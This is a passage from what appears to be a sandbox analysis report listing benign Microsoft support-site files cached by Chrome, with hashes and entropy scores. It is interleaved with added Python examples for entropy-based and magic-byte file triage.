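A caveat on the Entropy (8bit) and Encrypted columns in these dropped-file records: the gzip stream above, at entropy 7.99, is marked Encrypted: true, while the two PNG entries in this list, at 7.88 and 7.95, are not, and gzip output is compressed rather than encrypted. Whatever cut-off the tool applies, a near-8.0 entropy score on its own cannot separate an encrypted or packed payload from an ordinary compressed container, so a triage step should check container magic before reading the flag as evidence of encryption. The Python below is an added example written for this page, not Joe Sandbox code: it recomputes the 8-bit Shannon entropy the column reports, reads the gzip ISIZE trailer that the File Type line renders as "original size modulo 2^32", and combines both with a magic check. The 7.9 threshold, the word list and the sample text are constructed assumptions, not values taken from the report.

```python
import gzip
import math
import random
from collections import Counter

# Constructed inputs standing in for the Chrome-dropped web assets listed in
# the report; they are NOT the files the report hashed.
_rng = random.Random(20241229)
_WORDS = ["banner", "sticky", "margin", "padding", "flex", "align", "items",
          "center", "function", "return", "var", "const", "document", "query"]
SAMPLE_TEXT = " ".join(_rng.choice(_WORDS) for _ in range(20000)).encode("ascii")
# mtime=0 keeps the gzip header deterministic across runs.
SAMPLE_GZIP = gzip.compress(SAMPLE_TEXT, compresslevel=9, mtime=0)

# Assumed cut-off for an "Encrypted" heuristic; the tool's real threshold is
# not stated on this page.
ENTROPY_THRESHOLD = 7.9

# Container signatures that legitimately produce near-8.0 entropy.
MAGIC = {
    b"\x1f\x8b": "gzip",
    b"\x89PNG\r\n\x1a\n": "png",
}


def shannon_entropy_8bit(data: bytes) -> float:
    """Bits per byte, the quantity the 'Entropy (8bit)' column reports.
    0.0 for a constant byte stream, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def container_type(data: bytes):
    """Name of the container if the data starts with a known magic, else None."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def gzip_isize(data: bytes) -> int:
    """Uncompressed length modulo 2^32 from the gzip ISIZE trailer (last four
    bytes, little-endian), the value `file` prints as 'original size modulo 2^32'."""
    if container_type(data) != "gzip" or len(data) < 18:
        raise ValueError("not a gzip member")
    return int.from_bytes(data[-4:], "little")


def triage(data: bytes) -> dict:
    """Combine entropy with a magic check so that compressed containers are not
    reported as encrypted payloads on entropy alone."""
    ent = shannon_entropy_8bit(data)
    kind = container_type(data)
    if kind is not None:
        verdict = "compressed"
    elif ent >= ENTROPY_THRESHOLD:
        verdict = "high-entropy"  # candidate: encrypted, packed, or random bytes
    else:
        verdict = "plain"
    return {
        "entropy": round(ent, 6),
        "container": kind,
        "encrypted_by_threshold": ent >= ENTROPY_THRESHOLD,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for label, blob in (("text", SAMPLE_TEXT), ("gzip", SAMPLE_GZIP)):
        print(label, len(blob), triage(blob))
    print("ISIZE", gzip_isize(SAMPLE_GZIP), "actual", len(SAMPLE_TEXT) % 2**32)
```

Run on real dropped files, `triage` keeps the entropy score for the record but lets the container check decide the verdict; a file with no recognised magic that still scores above the threshold is the one worth a second look.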
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):20879
                                                                                                                      Entropy (8bit):7.950262750419023
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:46Xz3aJorn/4FQhJt9fr1Ql3LyjJELj+Se9ouEkcQb0We77nGwIZOYjHmvGSZpV:4CaurgGn9fr1Q1GGLjVmsCa77GwIZfjM
                                                                                                                      MD5:133A012311EC0C7DC8900D41BFFE18E2
                                                                                                                      SHA1:A8344E3CB54AC529652411C13DE0FC9F18C72418
                                                                                                                      SHA-256:BC07BB9CDAECB6BB882CCD19058DD50E6376C9D0D4DAEB5576949CF80C1E5DF0
                                                                                                                      SHA-512:84AAE06C3C881FB388A4EB69478C3A15CCA7DDBC018C3D8942B772F9D30790322AC4398EF7C9F147BE3FFF14F63F184F3AD4BBB6666785704DB47DA43F1DC175
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/4470ec79-00a3-4730-afac-81a256ffb26b.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...Q$IDATx.....Q.s..x...................1`G..2^y..<...p.k..M..:.'OJ.L.nU._DGw..[U...2S....o~....W..i...5c...,...x5v...5..Yu...u{.j..[K...J.G\...M.=I.e....5......!........oms.|r....Hd..e.(.,7...Qc.z.>|e.t.E...s..V.rJ.C.......AEI...Q.S.1..y..N.}R=.s.j.Z. .^..R.. ....T.....QV..H.gT.....N.4.<...H.&^V-...+..FHar...3.*Wt.F....h.....}.fY....R.K..~,.N.U.TN.,..*}n.W\.."..8....eE.(o...|.........cm.FDi..].9N.p.>j..%.fY7F...........p..q.......z..k...#..g.l.D..xi.;...&.....P.k....9=&.F~.._...."...V7.L...:.....Q..NX.j\Q...1KZA%....6P.VG......e<m.B.m..H!5r....Bg.h...f.';...y=...X.:B8i.R..Kz.U.t.&.ZB...(aZ....".!..F.T`w..&.Y.s.......|..6ZDi.D..D...RI..:wd+./G:&......Z.Z.m.).....5@..N.......X[no...*.5..k3.Q1Q..5!.\.&p..^.1MR|.M..d.r.....s..WJ...=s0.N....`.......V.S,Z5....#*..T4...B....n.DF.NZ...d....&..Mk..........N....D[..yJ.I:NE..*.j..M..T.2-iZ.E..$.F.V.;......R..X.'g..v+k.....C.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):21727
                                                                                                                      Entropy (8bit):5.232101618468897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:xYzlQeau9P3TI8NCUiLFv1uP4ZVSc2uQyea+eHbJjaTbz7NiCR6Rv98NOsQzOiL/:xYhQel3TI2ChBt2OVSZuQoJjG7N1R6Rp
                                                                                                                      MD5:C49C34EE38F103BCB82F58DED32F57DB
                                                                                                                      SHA1:757C8CE6D92102903F636C20B70E414A5E9A2E20
                                                                                                                      SHA-256:BDBBDA3BD97031FF5BCB76B427D2ECD9C4617922C3860F662E51FB18AC5CC591
                                                                                                                      SHA-512:5C5307784F8B7D3CF479154CADF3525D1D1BF05216D72BB32ABEF6E25183E26FB4D84DB7B14AA2868B11F54E23284D02BFE0309EE4D560AC79A507F762DBC219
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/feedback.js?v=vbvaO9lwMf9by3a0J9Ls2cRheSLDhg9mLlH7GKxcxZE
                                                                                                                      Preview:/*! Copyright (C) Microsoft. All rights reserved. */....(function ($) {...'use strict';...(function smartFeedback() {....var activatedStarRatingValue = null;....var activatedStarRatingLabel = null;....var userSelectionIsInfoHelpful = null;......var checkBoxSelected = false;....var starRatingSelected = false;....var verbatimEntered = false;....var $spanDisplayElementsForStarCheckbox = $(".translationRatingStar, .checkboxTick");....var $extendedFeedbackStarCheckboxElements = $(".translationRatingStar, .articleExperienceOptionsCheckbox");......var $extendedFeedback = $("#extendedFeedback");....var $extendedFeedbackForm = $("#extendedFeedbackForm");....var $feedbackWrapper = $('#supWrapperToPreventFeedbackFlickering');....var $starRatingDescription = $("#starRatingDescription");....var $supDisableStickyFeedbackButton = $("#supDisableStickyFeedbackButton");....var isEnableStarRating = $feedbackWrapper.data("enableStarRating") ? $feedbackWrapper.data("enableStarRating").toLowerCase() === "tr
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65456)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1223686
                                                                                                                      Entropy (8bit):5.470883113843709
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:8uEPjek2NG0LmOkLrZ+DOR+rO0sOO322khnEZs4BeQ/7W6fC71zwFgopM9eiaYcn:8uEPj+NG0LmOkLrZ+DOR+r+OO322khnk
                                                                                                                      MD5:261012FF1027F9B1F28717BEA40973F6
                                                                                                                      SHA1:885F5D7A571E165EEA0E09BA86C16042D697AA6B
                                                                                                                      SHA-256:1F586745BEC9A6372D87011A3F110AFA51E3F72835E7A723D2E75544BFEFBBE1
                                                                                                                      SHA-512:88C3706F6E5A1392D49FCBBD3B8B33D5A522031427621275387BB7764E40B4AE1980ED5C3297EAC4E953EE91AA131AF69BB3DE816101675B907A705E5E2E2213
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! For license information please see Support.Main.min.js.LICENSE.txt */.!function(){var e,t={7046:function(e,t){var n={parseBuffer:function(e){return new r(e).parse()},addBoxProcessor:function(e,t){"string"==typeof e&&"function"==typeof t&&(i.prototype._boxProcessors[e]=t)},createFile:function(){return new r},createBox:function(e,t,n){var r=i.create(e);return t&&t.append(r,n),r},createFullBox:function(e,t,r){var i=n.createBox(e,t,r);return i.version=0,i.flags=0,i},Utils:{}};n.Utils.dataViewToString=function(e,t){var n=t||"utf-8";if("undefined"!=typeof TextDecoder)return new TextDecoder(n).decode(e);var r=[],i=0;if("utf-8"===n)for(;i<e.byteLength;){var a=e.getUint8(i++);a<128||(a<224?(a=(31&a)<<6,a|=63&e.getUint8(i++)):a<240?(a=(15&a)<<12,a|=(63&e.getUint8(i++))<<6,a|=63&e.getUint8(i++)):(a=(7&a)<<18,a|=(63&e.getUint8(i++))<<12,a|=(63&e.getUint8(i++))<<6,a|=63&e.getUint8(i++))),r.push(String.fromCharCode(a))}else for(;i<e.byteLength;)r.push(String.fromCharCode(e.getUint8(i++)));return
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (10933)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10978
                                                                                                                      Entropy (8bit):5.113898622156223
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:fhsrAxRhWsJlXOeZTxB2Q3os25mPZT8u4wtVVAkhSOWzaVBmdcYZ:lJlvZTjv3os25mPF4wtbAkhSOWmjQc8
                                                                                                                      MD5:81C98606FDCF5261F4626856A3A920A6
                                                                                                                      SHA1:535E11D6D16FFC17316EFB6B1EA553335DE5F2A0
                                                                                                                      SHA-256:6D774AED5BE6E9D53DB8DF5432FB7E6642E90BB1315F49E63FE6FF4340ECC156
                                                                                                                      SHA-512:EE28BED0C8E277EDDECF0055AA8D3BF1FCE966E5352F2401C7E587487029282CDF9EBEAA6B1611992F4A331029EF708876331244C4A395047756D7F526F4C653
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";var t="click",e="ocHidden",n="supCardControlCarouselDisabledButton",o=".supCardControlCarouselPrevButton",i=".supCardControlCarouselNextButton",r="".concat(o,", ").concat(i);function a(t,e){$(t).children(r).toggleClass(n,!e)}var s=".supCardControlContainer",l=".supCardControlCard",c=".heroCardControlCard";function u(){var t=this.querySelector("div.videoContainer");if(t){var e=t.querySelector("div.supCardControlImageContainer");e&&e.addEventListener("click",(function(){var e=t.querySelector("div.cardControlCarouselVideoArea");if(e){var n=e.querySelector("universal-media-player");n&&(e.removeAttribute("hidden"),n.play())}}))}}function d(t){$(t).on("setPosition",(function(t,e){var n,o=e.$dots;(null===(n=e.options)||void 0===n?void 0:n.slidesToShow)<e.slideCount?o.show():o.hide()}))}function h(t,e){t&&(t.style.backgroundImage=""===e?"none":"url(".concat(e,")"),t.classList.add("heroCarouselSection"))}function f(t,e,n){var o=t.find(n);if(o.length){var i="focus"===e.t
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (30637)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):30689
                                                                                                                      Entropy (8bit):5.2772011788579976
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:12o2k0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:1Fh0S0/ks2JdImYFcw662A86vzyR
                                                                                                                      MD5:2E588806E1E8D448863AD309DA157830
                                                                                                                      SHA1:EE81E8B66D1922627A8942A718DDDB7C118330EF
                                                                                                                      SHA-256:C4ED0055730356F2162754A66573B41DCB96BF6E9648AAB63ACF5D81DA80A6EC
                                                                                                                      SHA-512:90904F7F2143889D2DC1DF031B51A0DE2558352571E91067A529CCE089CC835A1DC5D0FC6CE6538CA7A8F1829EC3C40DE4176D70DA47FFED26A154557B642892
                                                                                                                      Malicious:false
                                                                                                                      URL:https://mem.gfx.ms/meversion?partner=Windows&market=en-us&uhf=1
                                                                                                                      Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"windows","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":true,"graphinfo":{"graphclientid":"7eadcef8-456d-4611-9480-4fff72b8b9e2","graphscope":"user.read","graphcodeurl":"https://login.microsoftonline.com/common/oauth2/v2.0/authorize","graphredirecturi":"https://amcdn.msftauth.n
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):20946
                                                                                                                      Entropy (8bit):7.93232536946356
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:ecpgK1ekapmcRcYDw6SaYAwQTniYPMalqQm6vkoP9njpqNT:eKjUkapAsw6C9ePM2qQm6vkoFnwT
                                                                                                                      MD5:68B6034D22E6083CF2592BF4B8B71F0E
                                                                                                                      SHA1:0981B22AF5F2BF930794557717FF7C7F4FF563FF
                                                                                                                      SHA-256:56E5D47C342207184BE9DE6E3CF06CF26C32B34EE799B3ACC95EBEEEEFA5484A
                                                                                                                      SHA-512:3CDA6510769E8EE427103B1D76A0035E2A3E62C4EF0E789DBC28969B12F2DF2C1F7E7652FDF9CC99C7C086CF2764A19520D15A5FED86ECC5CAB9D9F77D534E93
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/9e557d93-f803-44df-a274-1282d542cf63.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...QgIDATx....nEy....j.%bU.X..n^......Im..M."Z...+hU...m.e.....A.FQ.m......D....ELTD...Uo}...>.|3....v....y..gf.:.?.yf..n.m..a..*......+.~..J u..}.k.........:;v.P......qM.c;.1.S..j..@v....O...c.@.....5Z.P.E{...P.(.......PvvQ..... .IGj...U.:}.#..Xghj.C.MQ...Kua...)G,4]..?.........#.......w.Ti'.Vy....S....%._).'...J...%.u\.R.Oo.R,p......"Y....N:V*.P.R.W......O..Pk...n......Z.....).....HVc.Z.M....H....X......5....$....p......".>...<U...Sc.|.K...Q.NR...k...k...F...).....H...=.....+.zj(....]/5.\.........).....H...\.@.;.|......*.I.&5.'.(6.cTz^.....c.r...r....k.)s.b..<.#......I.1R....k..6........R.d....r.]...NT].H.....D.#%.N..X.......7.t,..z.;cS.p].f....E-...6.#......IuG...p..c[.g.`..v..R1V...J.9.J... ..HqIw.NS..........3.G..pI.+p.....#.N.......Gp....).....Hf.H..1.#.*4..2r.f....t..;.Z.7W........".=1d...^.....M ..I..T...../.t.T...........*....._JLz)......{..h*FJ...E..t9.).WaXj&
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2674)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2728
                                                                                                                      Entropy (8bit):5.253272384445131
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:M1wQmQqQNrfAI4dz2eLNBxROk2oDZ8nVlnQiOk50NQclnmlnmZ5flnqlnuln5jBN:emQjNj4t2eLNgsdiQj+RacmVYU57vzKO
                                                                                                                      MD5:468D4ACC570CFFC7101AC8A63514AD31
                                                                                                                      SHA1:6983E89B6EC798B5B8C2B3B76D9311808437B572
                                                                                                                      SHA-256:B4B342F2025799CA602A75590B324E7493B0903726720BCE4CA793207C83255C
                                                                                                                      SHA-512:9042A219E8511FF281B9F680B3577CE3EAE29E881F24BE1D2B46C89D1F0013E30AA890C1A0181FF83975E125F62C0C6E896D3B8515067221143D9A3290B42865
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/MeControlCallout.Main.min.js?v=tLNC8gJXmcpgKnVZCzJOdJOwkDcmcgvOTKeTIHyDJVw
                                                                                                                      Preview:!function(){"use strict";var t,e,n=function(t){try{return sessionStorage.getItem(t)}catch(t){}return null};!function(t){t.EXPANDED="meControlAccountSelectorExpanded",t.COLLAPSED="meControlAccountSelectorCollapsed",t.SWITCHTYPE="meControlSwitchAccountType",t.SWITCHMSA="meControlSwitchMSAAccount",t.SWITCHAAD="meControlSwitchAADAccount"}(t||(t={})),function(t){t.REMOVE="teachingCalloutRemove",t.SHOWN="teachingCalloutShown",t.TIMEOUT="teachingCalloutTimeout"}(e||(e={}));var o,i,a=$("#meControl"),l=$("#smcTeachingCalloutPopover"),c=$("#teachingCalloutDismiss"),r="teachingCalloutShown";function d(t,e){var n,o={isAuto:!1,content:{contentId:e},behavior:t};null===(n=window.analytics)||void 0===n||n.captureContentUpdate(o)}$((function(){l&&l.length>0&&(function(t,e){if(t.length&&e.length){var n=t.offset().top;i=window.setInterval((function(){var o=e.offset().top;t.offset({top:n+o})}),15)}}(l,a),window.document.addEventListener("displayTeachingCallout",(function(t){try{if(null===n(r)&&null!=t.det
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (503)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):558
                                                                                                                      Entropy (8bit):4.98634955391743
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:c83DOkFYerjD6tD7fgu1M+WqQRxsZAsDFYAWCyQPO:cmZr6t/zpeT/oWCyaO
                                                                                                                      MD5:A3BC5418F2834309CE2918B15F3B8EEA
                                                                                                                      SHA1:62BA2712C6D4960F1057E103F6E1F3C95F2C701B
                                                                                                                      SHA-256:B2B62643A7C4FE4A4E12934AD819F0293CC00181B78D8091AFFFF3617CEB96B1
                                                                                                                      SHA-512:460E22E36E93BEC194D00D47754108539D2E54FF59D4293EEC25463BC3D642879C10D9BBFD881BBE5EC244819F325C422B6D7A7504000BBCE432E4D2A08FB58B
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/shimmerExperiment.Main.min.js?v=srYmQ6fE_kpOEpNK2BnwKTzAAYG3jYCRr__zYXzrlrE
                                                                                                                      Preview:!function(){"use strict";function e(e){return document.querySelectorAll(e)}function t(e,t){e.remove(),t.style.removeProperty("display")}window.addEventListener("load",(function(){var o,r=e(".ocpSectionLayout .ocpSection"),n=e(".ocpSectionLayout .shimmer-effect");if(r.length===n.length)for(var i=0;i<n.length;i++){var c=(o=n[i],Number(o.getAttribute("shimmer-delay")));setTimeout(t,c,n[i],r[i])}else n.forEach((function(e){e.remove()})),r.forEach((function(e){e.style.removeProperty("display")}))}))}();.//# sourceMappingURL=shimmerExperiment.Main.min.js.map
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):25084
                                                                                                                      Entropy (8bit):7.954629745011792
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:z4b+mWMn+0y7Pg/1ZG7QBkT1ptdZXWVTTaGOKPKb3BZE3SDL0Fkx1qEPNugrtRPI:E+5Mn34PglkT9XICcPKb3Bh0e5tQT
                                                                                                                      MD5:9AA997545CAD62F24960E39B773AE81C
                                                                                                                      SHA1:3EBF01E3B3630F127309F816F13FF86B94798E07
                                                                                                                      SHA-256:BC5E9528086858FD7BFF758A1B0AE0D559A9930E279ECDF4955572B6AD1E53EA
                                                                                                                      SHA-512:4B2572DEA6B5C777AF39359095D97EB8078B3B252D4A70191837BF5C641B860CD4AF56719B3D96E45CBEBB13465625FD5DD6E66BC03F009487FEBEAF5D9F7169
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...a.IDATx..y..Eu...u}.@1.....D...IX..0,A..Fc.`.,.D..H .eUX.....E..X.H...1q......(....*l...r.!.....rz.....yf......9.{6z.......h....__......r.S.C..F...T.o...<.9.M..$].6.:...9..vSrN.B.2.Ug....x..rU6i>zY..C.lK.._.v.H.......9.S..U.]T.v..Y8..LJ...tl.C....m(...&.(QpAP.x\".._.G..$.L..)T[.."j$...}...@>z.n-..X.U..45&.S*.....N.m\...m"I"...\.q.|M.6#.............Q....."*...e..m.6..f.....Sj...cK+DH...+]..".......i..Q.......xS.24@....C".$b*.]'Y...<J.$.jY7J........i..0..1..........y./)Db.@_@.m.X|..u..f..w..C@.\{.mc..u&....5k..`.j.ZO7.L...7.....R..zxp...B...Y..*..&!#..v...m[.\|!}....B%-..K!U..cjj..Z...^...(.J....LHYK.'.@r.....*d[..Q>..[VJ..b...H5H-....h.9..K.;.1..#.)fy.........r..B.X.L.)..PV$=..:.6!.B..Z.|...).....%@..IK.G....'ci....(.-.......R.....5W..]..4.......2[..m...9..g...w.....p.4t..... ..(.je...r..R....{E.y.Xhr..U.>.H....5}.,Q.4S.$..I...R..` ....=R.#.-Y.}l......U.W...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65451)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):89476
                                                                                                                      Entropy (8bit):5.2896589255084425
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                      MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                      SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                      SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                      SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/lib/jquery/dist/jquery.min.js?v=9_aliU8dGd2tb6OSsuzixeV4y_faTqgFtohetphbbj0
                                                                                                                      Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
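Added example, not code from Joe Sandbox or from the report: a small parser and triage pass over dropped/downloaded file records in the field layout listed above. The two records embedded as sample input copy the Process, File Type, Category, Size, Entropy, Encrypted, hash and URL fields of the 4470ec79 PNG and feedback.js entries above verbatim, with the Preview field shortened; the bytes handed to shannon_entropy() are constructed here and are not the real file contents. The "high entropy but not a compressed format" rule and the hash well-formedness check are the author's own heuristics, not rules the report applies.

```python
# Added example: parse Joe Sandbox dropped/downloaded file records, recompute
# the 8-bit Shannon entropy behind the "Entropy (8bit)" field, and apply two
# triage heuristics (assumptions of this example, not Joe Sandbox logic).
import math
import re
from collections import Counter, defaultdict

FIELD_RE = re.compile(
    r"^\s*(Process|File Type|Category|Size \(bytes\)|Entropy \(8bit\)|Encrypted|"
    r"SSDEEP|MD5|SHA1|SHA-256|SHA-512|Malicious|URL|Preview):(.*)$"
)

# Sample input: two records copied from the report above, Preview shortened.
SAMPLE_RECORDS = """\
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):20879
Entropy (8bit):7.950262750419023
Encrypted:false
MD5:133A012311EC0C7DC8900D41BFFE18E2
SHA1:A8344E3CB54AC529652411C13DE0FC9F18C72418
SHA-256:BC07BB9CDAECB6BB882CCD19058DD50E6376C9D0D4DAEB5576949CF80C1E5DF0
Malicious:false
URL:https://support.content.office.net/en-us/media/4470ec79-00a3-4730-afac-81a256ffb26b.png
Preview:.PNG........IHDR
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:ASCII text, with CRLF line terminators
Category:downloaded
Size (bytes):21727
Entropy (8bit):5.232101618468897
Encrypted:false
MD5:C49C34EE38F103BCB82F58DED32F57DB
SHA1:757C8CE6D92102903F636C20B70E414A5E9A2E20
SHA-256:BDBBDA3BD97031FF5BCB76B427D2ECD9C4617922C3860F662E51FB18AC5CC591
Malicious:false
URL:https://support.microsoft.com/js/feedback.js?v=vbvaO9lwMf9by3a0J9Ls2cRheSLDhg9mLlH7GKxcxZE
Preview:/*! Copyright (C) Microsoft. All rights reserved. */
"""


def parse_records(text):
    """Split field lines into records; each 'Process:' line opens a new one.
    Fields seen before any 'Process:' line (a record whose header was cut
    off, as at the top of the listing above) form their own partial record."""
    records, cur = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if key == "Process" or cur is None:
            cur = {}
            records.append(cur)
        cur[key] = val
    return records


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, 0.0 (one byte value) to 8.0
    (uniform). This is the quantity the 'Entropy (8bit)' field reports."""
    if not data:
        return 0.0
    n = len(data)
    return 0.0 - sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Formats that are already compressed and therefore legitimately near 8.0.
COMPRESSED_TYPES = ("PNG image", "JPEG image", "gzip", "Zip archive", "7-zip", "RAR", "WebP")


def entropy_mismatch(rec, threshold=7.0):
    """Heuristic (assumption of this example): near-maximum entropy in a file
    whose declared type is not a compressed format is worth a look as a
    possibly packed or encrypted payload, whatever 'Encrypted' says."""
    try:
        ent = float(rec.get("Entropy (8bit)", "0"))
    except ValueError:
        return False
    return ent >= threshold and not any(t in rec.get("File Type", "") for t in COMPRESSED_TYPES)


HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA-256": 64, "SHA-512": 128}


def well_formed_hashes(rec):
    """True when every hash field present is hex of the expected length;
    anything else usually means the record was damaged in extraction."""
    return all(
        re.fullmatch(r"[0-9A-Fa-f]{%d}" % length, rec[name]) is not None
        for name, length in HASH_LENGTHS.items() if name in rec
    )


def by_process(records):
    """Group records by the writing process, so browser cache hits can be
    reviewed apart from files written by the sample or its children."""
    groups = defaultdict(list)
    for r in records:
        groups[r.get("Process", "<unknown>")].append(r)
    return dict(groups)


def triage(text):
    recs = parse_records(text)
    return {
        "count": len(recs),
        "high_entropy_non_compressed": [r.get("SHA-256") for r in recs if entropy_mismatch(r)],
        "malformed": [r.get("SHA-256") for r in recs if not well_formed_hashes(r)],
        "processes": sorted(by_process(recs)),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_RECORDS))
    print(shannon_entropy(bytes(range(256))), shannon_entropy(b"AAAA" * 100))
```

Both sample records come from chrome.exe and are ordinary support-site content, so triage() reports no findings for them; the value of the pass is on a full listing, where by_process() separates such browser traffic from files written by the sample and entropy_mismatch() picks out a high-entropy blob declared as plain "data" that the Encrypted field alone would not flag.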
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (514)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):941
                                                                                                                      Entropy (8bit):5.237366916956353
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:IlxCSV6Pfo4ydsethmnUitaKKklq93+TEDzD:IlQ3sdbtKUitaKHCsEDzD
                                                                                                                      MD5:6FC8AFFCA0D3B2C5BDC78E27C9425BCE
                                                                                                                      SHA1:1348892B3663F4496C35732DDC4D853452F48054
                                                                                                                      SHA-256:531C0795866BF6D1BD0E44A4239CFFB3F0FAC07CC911BEA226ADF84E9C3DDAA7
